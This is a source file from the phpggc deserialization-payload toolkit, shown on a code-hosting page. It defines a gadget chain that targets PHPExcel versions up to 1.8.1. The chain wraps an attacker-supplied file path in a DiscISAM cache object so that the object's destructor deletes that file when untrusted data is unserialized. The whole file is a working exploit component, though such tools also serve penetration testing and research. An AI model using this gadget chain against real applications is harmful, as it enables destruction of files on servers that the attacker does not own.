Codebase list phpggc / upstream/0.20210218 gadgetchains / PHPExcel / FD / 2 / chain.php
upstream/0.20210218

Tree @upstream/0.20210218 (Download .tar.gz)

chain.php @upstream/0.20210218raw · history · blame

<?php

namespace GadgetChain\PHPExcel;

class FD2 extends \PHPGGC\GadgetChain\FileDelete
{
    public static $version = '<= 1.8.1';
    public static $vector = '__destruct';
    public static $author = 'erwan_lr';
    
    public function generate(array $parameters)
    {
        return new \PHPExcel_CachedObjectStorage_DiscISAM($parameters['remote_file']);
    }
}